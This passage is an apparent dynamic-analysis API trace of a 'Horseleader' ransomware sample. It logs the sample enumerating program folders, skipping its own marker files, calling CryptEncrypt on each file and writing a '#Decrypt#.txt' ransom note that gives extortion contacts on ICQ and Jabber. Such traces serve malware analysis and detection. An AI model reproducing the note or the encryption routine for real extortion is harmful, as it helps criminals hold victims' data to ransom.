pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.811] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.812] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff493d1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff493d1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f29d477, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0251.812] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0251.812] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png") returned 75 [0251.812] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".horseleader") returned 0x0 [0251.812] lstrcmpW (lpString1="203x8subpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.812] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.812] lstrlenW (lpString=".testttjffg") returned 11 [0251.812] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.812] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.812] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.812] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.812] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70007aa2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70007aa2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f92909f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.812] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.812] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png") returned 88 [0251.812] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.812] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.813] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.813] lstrlenW (lpString=".testttjffg") returned 11 [0251.813] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.813] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: 
pbBuffer=0x32aea98) returned 1 [0251.813] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.813] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.813] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ffe1945, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ffe1945, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fa59b8f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.813] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.813] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png") returned 94 [0251.813] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.813] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.813] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.813] lstrlenW (lpString=".testttjffg") returned 11 [0251.813] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.813] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.813] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.813] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.814] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70007aa2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70007aa2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fa59b8f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.814] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.814] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png") returned 89 [0251.814] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.814] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.814] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", 
lpString2="_uninstalling_.png") returned 1 [0251.814] lstrlenW (lpString=".testttjffg") returned 11 [0251.814] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.814] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.814] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.814] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.814] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff9568b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff9568b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.814] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.814] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png") returned 95 [0251.814] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.814] lstrcmpW 
(lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.814] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.814] lstrlenW (lpString=".testttjffg") returned 11 [0251.814] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.815] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.815] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.815] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.815] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff6f52e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff6f52e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.815] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.815] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png") returned 86 [0251.815] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.815] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.815] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.815] lstrlenW (lpString=".testttjffg") returned 11 [0251.815] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.815] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.815] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.815] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.815] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ffbb7e8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ffbb7e8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.815] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.815] 
wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png") returned 92 [0251.816] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.816] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.816] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.816] lstrlenW (lpString=".testttjffg") returned 11 [0251.816] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.816] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.816] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.816] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.816] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff23274, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff23274, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x547b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="shatter.png", 
cAlternateFileName="")) returned 1 [0251.816] lstrcmpiW (lpString1="shatter.png", lpString2="Windows") returned -1 [0251.816] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png") returned 67 [0251.816] StrStrIW (lpFirst="shatter.png", lpSrch=".horseleader") returned 0x0 [0251.816] lstrcmpW (lpString1="shatter.png", lpString2="#Decrypt#.txt") returned 1 [0251.816] lstrcmpW (lpString1="shatter.png", lpString2="_uninstalling_.png") returned 1 [0251.816] lstrlenW (lpString=".testttjffg") returned 11 [0251.816] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png", lpSrch=".testttjffg") returned 0x0 [0251.816] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.816] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.817] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\shatter.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.817] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff23274, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff23274, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x547b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="shatter.png", cAlternateFileName="")) returned 0 [0251.817] FindClose (in: 
hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.818] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\#Decrypt#.txt") returned 69 [0251.818] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.820] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.820] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.821] lstrlenA (lpString="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") returned 1368 [0251.821] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.821] CloseHandle (hObject=0x158) returned 1 [0251.821] GetProcessHeap () returned 0x780000 [0251.821] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.821] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a65ec8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa92ba2a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SpecialOccasion", cAlternateFileName="SPECIA~1")) returned 1 [0251.821] lstrcmpiW (lpString1="SpecialOccasion", lpString2="Windows") returned -1 [0251.821] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 63 [0251.821] lstrcmpW (lpString1="SpecialOccasion", lpString2=".") returned 1 [0251.821] lstrcmpW (lpString1="SpecialOccasion", 
lpString2="..") returned 1 [0251.822] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.822] GetProcessHeap () returned 0x780000 [0251.822] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.822] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\*") returned 65 [0251.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a65ec8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa92ba2a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.824] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.824] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\.") returned 65 [0251.824] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.824] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a65ec8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa92ba2a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.824] lstrcmpiW (lpString1="..", lpString2="Windows") 
returned -1 [0251.824] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\..") returned 66 [0251.824] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.824] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.824] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f446eef, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f446eef, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fc22bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.824] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.825] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png") returned 81 [0251.825] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.825] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.825] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.825] lstrlenW (lpString=".testttjffg") returned 11 [0251.825] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.825] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.825] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.825] CreateFileW (lpFileName="\\\\?\\C:\\Program 
